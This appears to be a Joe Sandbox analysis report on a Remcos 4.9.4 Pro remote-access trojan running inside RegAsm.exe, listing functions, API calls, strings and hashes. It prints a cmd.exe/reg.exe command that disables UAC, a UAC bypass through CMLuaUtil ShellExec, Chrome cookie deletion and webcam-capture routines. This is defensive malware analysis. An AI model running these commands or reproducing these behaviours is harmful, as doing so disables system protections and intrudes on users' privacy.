                                                        • String ID: C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe$[+] ShellExec success$[+] before ShellExec$[+] ucmCMLuaUtilShellExecMethod
                                                        • API String ID: 3851391207-2216821008
                                                        • Opcode ID: 511e675c99acabaccc32e6a32445821ea963e9a83317c60cb45550512dba77c0
                                                        • Instruction ID: 681a2da4e9d4b9e6b45db6330fec0c9e961fb52a18ca78f8243115a9baea1a6b
                                                        • Opcode Fuzzy Hash: 511e675c99acabaccc32e6a32445821ea963e9a83317c60cb45550512dba77c0
                                                        • Instruction Fuzzy Hash: B201D272B087016BE2245B25DC0EF6B7758DB81729F11083FF902A61C2EBA9BC0145AB
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0040BAA1 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 49fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 0040BADD
                                                        • GetLastError.KERNEL32 ref: 0040BAE7
                                                        Strings
                                                        • [Chrome Cookies found, cleared!], xrefs: 0040BB0D
                                                        • UserProfile, xrefs: 0040BAAD
                                                        • \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 0040BAA8
                                                        • [Chrome Cookies not found], xrefs: 0040BB01
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: DeleteErrorFileLast
                                                        • String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
                                                        • API String ID: 2018770650-304995407
                                                        • Opcode ID: 1760e3e0d40a85f21b6d805f5d6a4de2d8cd9e2060f798d2c7163d0a527507e4
                                                        • Instruction ID: 6bc0ec4de36c0471385c24d45a27137009bd471b3f80e31671ebbef4da92dce6
                                                        • Opcode Fuzzy Hash: 1760e3e0d40a85f21b6d805f5d6a4de2d8cd9e2060f798d2c7163d0a527507e4
                                                        • Instruction Fuzzy Hash: 08018F31A402095ACA04BBBACD5B8BE7724E912714F50017BF802726E6FE7D5A059ADE
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0041CD9B Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 48memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • AllocConsole.KERNEL32 ref: 0041CDA4
                                                        • ShowWindow.USER32(00000000,00000000), ref: 0041CDBD
                                                        • SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041CDE2
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Console$AllocOutputShowWindow
                                                        • String ID: Remcos v$4.9.4 Pro$CONOUT$
                                                        • API String ID: 2425139147-3065609815
                                                        • Opcode ID: 7204a5bae693ec2f4884850c6238c56aa94b879f8555490226ef59d43c8bca4e
                                                        • Instruction ID: 3d4e39fb732e2b6cb40f789e287104da8d9afdf675614735db993d10cd8ea689
                                                        • Opcode Fuzzy Hash: 7204a5bae693ec2f4884850c6238c56aa94b879f8555490226ef59d43c8bca4e
                                                        • Instruction Fuzzy Hash: CD0188719803087AD610F7F1DC8BF9D776C5B14705F6004277604A70D3E7BD9954466E
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0043AADC Relevance: 9.3, APIs: 6, Instructions: 284COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • __allrem.LIBCMT ref: 0043AC69
                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043AC85
                                                        • __allrem.LIBCMT ref: 0043AC9C
                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043ACBA
                                                        • __allrem.LIBCMT ref: 0043ACD1
                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043ACEF
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                        • String ID:
                                                        • API String ID: 1992179935-0
                                                        • Opcode ID: 324a3f8db7a4af308d45995ace6313bc09822ddcf2faf4fc4501ccf235525b64
                                                        • Instruction ID: 0cac597ccac2158415e78c81c2c349525783c2449c9f0a8280db41f57d0428da
                                                        • Opcode Fuzzy Hash: 324a3f8db7a4af308d45995ace6313bc09822ddcf2faf4fc4501ccf235525b64
                                                        • Instruction Fuzzy Hash: CC812B72640706ABE7209F29CC41B5BB3A9EF48324F24552FF590D7781EB7CE9108B5A
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00404371 Relevance: 9.2, APIs: 1, Strings: 5, Instructions: 206sleepCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • Sleep.KERNEL32(00000000,0040D262), ref: 004044C4
                                                          • Part of subcall function 00404607: __EH_prolog.LIBCMT ref: 0040460C
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: H_prologSleep
                                                        • String ID: CloseCamera$FreeFrame$GetFrame$HNG$OpenCamera
                                                        • API String ID: 3469354165-3054508432
                                                        • Opcode ID: 675044920d57351bd4be636fd76d132256166d9fc3ead1ba86e83f4fd14bb599
                                                        • Instruction ID: 62663cdee79800d8a54f028f5a980ee1c6790ad11611a7059aef087dab150aaf
                                                        • Opcode Fuzzy Hash: 675044920d57351bd4be636fd76d132256166d9fc3ead1ba86e83f4fd14bb599
                                                        • Instruction Fuzzy Hash: 5C51E1B1A042116BCA14FB369D0A66E3755ABC5748F00053FFA06677E2EF7C8A45839E
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00411CFE Relevance: 9.2, APIs: 6, Instructions: 206memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 0041179C: SetLastError.KERNEL32(0000000D,00411D1C,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00411CFA), ref: 004117A2
                                                        • SetLastError.KERNEL32(000000C1,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00411CFA), ref: 00411D37
                                                        • GetNativeSystemInfo.KERNEL32(?), ref: 00411DA5
                                                        • SetLastError.KERNEL32(0000000E,?,?,?,?,?,?,?,?,?), ref: 00411DC9
                                                          • Part of subcall function 00411CA3: VirtualAlloc.KERNEL32(00000040,00000040,00000040,00000040,00411DE7,?,00000000,00003000,00000040,00000000,?,?), ref: 00411CB3
                                                        • GetProcessHeap.KERNEL32(00000008,00000040,?,?,?,?,?), ref: 00411E10
                                                        • HeapAlloc.KERNEL32(00000000,?,?,?,?,?), ref: 00411E17
                                                        • SetLastError.KERNEL32(0000045A,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411F2A
                                                          • Part of subcall function 00412077: GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00411F37,?,?,?,?,?), ref: 004120E7
                                                          • Part of subcall function 00412077: HeapFree.KERNEL32(00000000), ref: 004120EE
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ErrorHeapLast$AllocProcess$FreeInfoNativeSystemVirtual
                                                        • String ID:
                                                        • API String ID: 3950776272-0
                                                        • Opcode ID: 03879881e365d714915aafd98c27fc7559b9a312a1bd96baf04abeae924ccd8f
                                                        • Instruction ID: a5564978de1508fcfe39aaa31f5973b4ee53e0220ffe5d2cf9b9f7f7cc9a58c7
                                                        • Opcode Fuzzy Hash: 03879881e365d714915aafd98c27fc7559b9a312a1bd96baf04abeae924ccd8f
                                                        • Instruction Fuzzy Hash: B661E370601201ABC7109F66C980BAB7BA5BF44744F04411BFA058B7A2E7BCE8D2CBD9
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 004458F9 Relevance: 9.2, APIs: 6, Instructions: 200COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: __cftoe
                                                        • String ID:
                                                        • API String ID: 4189289331-0
                                                        • Opcode ID: eef5811f0b3e11eaf1bdde4175ac7a9ebfa2f3cd5d18ba66a6432d1456243127
                                                        • Instruction ID: 6c78d09a6f5169ef6f707262af513c71f712f2c279f5202ad8aecd4a6012115a
                                                        • Opcode Fuzzy Hash: eef5811f0b3e11eaf1bdde4175ac7a9ebfa2f3cd5d18ba66a6432d1456243127
                                                        • Instruction Fuzzy Hash: D951EA72900A05ABFF209B59CC81FAF77A9EF49334F14421FF515A6293DB39D900866C
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0041AC78 Relevance: 9.1, APIs: 6, Instructions: 67serviceCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,00000000,?,?,?,0041A38E,00000000), ref: 0041AC88
                                                        • OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,?,?,0041A38E,00000000), ref: 0041AC9C
                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A38E,00000000), ref: 0041ACA9
                                                        • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,0041A38E,00000000), ref: 0041ACDE
                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A38E,00000000), ref: 0041ACF0
                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A38E,00000000), ref: 0041ACF3
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Service$CloseHandle$Open$ChangeConfigManager
                                                        • String ID:
                                                        • API String ID: 493672254-0
                                                        • Opcode ID: efec56fc5935d5a2572c80bdc1daad9799237a8c2fd258714d4154745ff5c6c1
                                                        • Instruction ID: ed0bae8235b77a8e2b5b4951a925fd67a34dfbd091713fce30693036f81a5133
                                                        • Opcode Fuzzy Hash: efec56fc5935d5a2572c80bdc1daad9799237a8c2fd258714d4154745ff5c6c1
                                                        • Instruction Fuzzy Hash: 84014E311452147BD6110B385C4DEFB3B5CDB42771F100317F925922D1EA68CD45B5EE
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00448215 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                                                        • _free.LIBCMT ref: 0044824C
                                                        • _free.LIBCMT ref: 00448274
                                                        • SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 00448281
                                                        • SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                                                        • _abort.LIBCMT ref: 00448293
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ErrorLast$_free$_abort
                                                        • String ID:
                                                        • API String ID: 3160817290-0
                                                        • Opcode ID: d577d612c1ffbc00090520c66a2c794f4cb9603406b177c38f93d9dbc2276fca
                                                        • Instruction ID: 1e51d54565af68f960eede883612623578b8b4ccb82fc25c91f14e3db4823c68
                                                        • Opcode Fuzzy Hash: d577d612c1ffbc00090520c66a2c794f4cb9603406b177c38f93d9dbc2276fca
                                                        • Instruction Fuzzy Hash: 15F0F935104F006AF611332A6C05B5F2515ABC276AF25066FF92892292DFACCC4581AD
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0041AAA6 Relevance: 9.0, APIs: 6, Instructions: 45serviceCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,00000001,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAB5
                                                        • OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAC9
                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAD6
                                                        • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAE5
                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAF7
                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAFA
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Service$CloseHandle$Open$ControlManager
                                                        • String ID:
                                                        • API String ID: 221034970-0
                                                        • Opcode ID: 4ae3873c1f536b49cfb6b65ca2e5a3703e9976f2291b0d96870e63be56c21842
                                                        • Instruction ID: 651adf303b3d55a6ad93a9774d9c6d096703db2647e4265c62a250da7e042a32
                                                        • Opcode Fuzzy Hash: 4ae3873c1f536b49cfb6b65ca2e5a3703e9976f2291b0d96870e63be56c21842
                                                        • Instruction Fuzzy Hash: 68F0C231541218ABD711AF25AC49EFF3B6CDF45BA2F000026FE0992192DB68CD4695E9
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0041ABAA Relevance: 9.0, APIs: 6, Instructions: 45serviceCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABB9
                                                        • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABCD
                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABDA
                                                        • ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABE9
                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABFB
                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABFE
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Service$CloseHandle$Open$ControlManager
                                                        • String ID:
                                                        • API String ID: 221034970-0
                                                        • Opcode ID: 81e2b4606ab98421978dc9842ef1edfa46dc1b90a9204ca08327dde20b0592b6
                                                        • Instruction ID: cdcae22f94af1ce7d279f83afe572816001e75aa845eac4345c2c81124f82824
                                                        • Opcode Fuzzy Hash: 81e2b4606ab98421978dc9842ef1edfa46dc1b90a9204ca08327dde20b0592b6
                                                        • Instruction Fuzzy Hash: 84F0C231501218ABD6116F259C49DFF3B6CDB45B62F40002AFE0996192EB38DD4595F9
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0041AC11 Relevance: 9.0, APIs: 6, Instructions: 45serviceCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC20
                                                        • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC34
                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC41
                                                        • ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC50
                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC62
                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC65
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Service$CloseHandle$Open$ControlManager
                                                        • String ID:
                                                        • API String ID: 221034970-0
                                                        • Opcode ID: fc89c5385e453168767847f65058b20f434ef67782af095c3a641765214ec1d0
                                                        • Instruction ID: 1af6be829003de2eeb85b71d4b0cbdb2c911632148e7083bdbbda8586ff13133
                                                        • Opcode Fuzzy Hash: fc89c5385e453168767847f65058b20f434ef67782af095c3a641765214ec1d0
                                                        • Instruction Fuzzy Hash: 2FF0F631501228BBD711AF25EC49DFF3B6CDB45B62F00002AFE0992192EB38CD4595F9
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0041D50F Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 57registryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ClassCreateErrorLastRegisterWindow
                                                        • String ID: 0$MsgWindowClass
                                                        • API String ID: 2877667751-2410386613
                                                        • Opcode ID: a7bf03488480a67a5ab74e572dd3e9b3283d69d087452f3b28ffeaf09d6b5029
                                                        • Instruction ID: 921741f364e14ac5d494c0d6481b3569f22aad0bbfd2e997b493b5423d792a6e
                                                        • Opcode Fuzzy Hash: a7bf03488480a67a5ab74e572dd3e9b3283d69d087452f3b28ffeaf09d6b5029
                                                        • Instruction Fuzzy Hash: 910129B1D00219BBDB00DFD5ECC49EFBBBDEA04355F40053AF900A6240E77859058AA4
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00407755 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 43processCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 0040779B
                                                        • CloseHandle.KERNEL32(?), ref: 004077AA
                                                        • CloseHandle.KERNEL32(?), ref: 004077AF
                                                        Strings
                                                        • C:\Windows\System32\cmd.exe, xrefs: 00407796
                                                        • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 00407791
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CloseHandle$CreateProcess
                                                        • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
                                                        • API String ID: 2922976086-4183131282
                                                        • Opcode ID: 86afbde76f2a9426f4ed7e8e7c7881cd7a3c7ba11745d0fd7a0dc136aa7099f4
                                                        • Instruction ID: bcd6b2dc2297655d1c2a6c7a9d844aadd79638dc8707381bf3a952a3ff6736b4
                                                        • Opcode Fuzzy Hash: 86afbde76f2a9426f4ed7e8e7c7881cd7a3c7ba11745d0fd7a0dc136aa7099f4
                                                        • Instruction Fuzzy Hash: BCF03676D4029D76CB20ABD6DC0EEDF7F7DEBC5B11F00056AF904A6141E6746404C6B9
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00407260 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 40COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        • C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe, xrefs: 004076C4
                                                        • SG, xrefs: 004076DA
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID: SG$C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
                                                        • API String ID: 0-97610266
                                                        • Opcode ID: a5e5064d23fdb4a5105bb888b891a2001f99cf11455aefb2b8df45e89f9c3324
                                                        • Instruction ID: 1b954d03a55cc3c1a25a26db856d3c6076ddce7f3b9fad0ad77fefb3a3407f05
                                                        • Opcode Fuzzy Hash: a5e5064d23fdb4a5105bb888b891a2001f99cf11455aefb2b8df45e89f9c3324
                                                        • Instruction Fuzzy Hash: 2CF046B0F14A00EBCB0467655D186693A05A740356F404C77F907EA2F2EBBD5C41C61E
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0044333A Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,004432EB,?,?,0044328B,?), ref: 0044335A
                                                        • GetProcAddress.KERNEL32(00000000,CorExitProcess,?,?,?,?,004432EB,?,?,0044328B,?), ref: 0044336D
                                                        • FreeLibrary.KERNEL32(00000000,?,?,?,004432EB,?,?,0044328B,?), ref: 00443390
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: AddressFreeHandleLibraryModuleProc
                                                        • String ID: CorExitProcess$mscoree.dll
                                                        • API String ID: 4061214504-1276376045
                                                        • Opcode ID: cc52f7ac488aa55dad4b7db89aaf695af0dd1fe717ea7d7a85019ca2162c21c0
                                                        • Instruction ID: b4f1316bd170a33105784e50650a9bde6d9e9410588fddf83d5a1a7bf10dc45d
                                                        • Opcode Fuzzy Hash: cc52f7ac488aa55dad4b7db89aaf695af0dd1fe717ea7d7a85019ca2162c21c0
                                                        • Instruction Fuzzy Hash: 6AF0A430A00208FBDB149F55DC09B9EBFB4EF04713F0041A9FC05A2261CB349E40CA98
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 004050E4 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 35synchronizationCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00405120
                                                        • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00404E7A,00000001), ref: 0040512C
                                                        • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,00404E7A,00000001), ref: 00405137
                                                        • CloseHandle.KERNEL32(?), ref: 00405140
                                                          • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
                                                        • String ID: KeepAlive | Disabled
                                                        • API String ID: 2993684571-305739064
                                                        • Opcode ID: 11e320f67abdd95442ebe69be37ae07741154b3609cf10b7525108ad99fbffe3
                                                        • Instruction ID: c1447ea2195e795a2fa4d382ed9a15925dec3dc8ccf256ab7d783030aa8980db
                                                        • Opcode Fuzzy Hash: 11e320f67abdd95442ebe69be37ae07741154b3609cf10b7525108ad99fbffe3
                                                        • Instruction Fuzzy Hash: 4CF06271904711BBDB103B758D0A66B7A54AB02311F0009BEF982916E2D6798840CF9A
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0041ADC0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30sleepCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                                        • GetModuleHandleA.KERNEL32(00000000,00020009), ref: 0041ADF2
                                                        • PlaySoundW.WINMM(00000000,00000000), ref: 0041AE00
                                                        • Sleep.KERNEL32(00002710), ref: 0041AE07
                                                        • PlaySoundW.WINMM(00000000,00000000,00000000), ref: 0041AE10
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: PlaySound$HandleLocalModuleSleepTime
                                                        • String ID: Alarm triggered
                                                        • API String ID: 614609389-2816303416
                                                        • Opcode ID: 458a9fadc2ddf1b51f38526f332080559b1bee2397fd5821544ba6e308cf5034
                                                        • Instruction ID: 9c0713ce1321a11b0f254193fe9a85ef30a97b7eb59a64372af151f10574a600
                                                        • Opcode Fuzzy Hash: 458a9fadc2ddf1b51f38526f332080559b1bee2397fd5821544ba6e308cf5034
                                                        • Instruction Fuzzy Hash: 36E01226B44260779620377B6D4FD6F3D28DAC2B5170100BEFA0666192D9580C4586FB
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0041CD58 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetStdHandle.KERNEL32(000000F5,00000000,?,?,?,?,?,?,0041CDED), ref: 0041CD62
                                                        • GetConsoleScreenBufferInfo.KERNEL32 ref: 0041CD6F
                                                        • SetConsoleTextAttribute.KERNEL32(00000000,0000000C), ref: 0041CD7C
                                                        • SetConsoleTextAttribute.KERNEL32(00000000,?), ref: 0041CD8F
                                                        Strings
                                                        • ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/ , xrefs: 0041CD82
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Console$AttributeText$BufferHandleInfoScreen
                                                        • String ID: ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/
                                                        • API String ID: 3024135584-2418719853
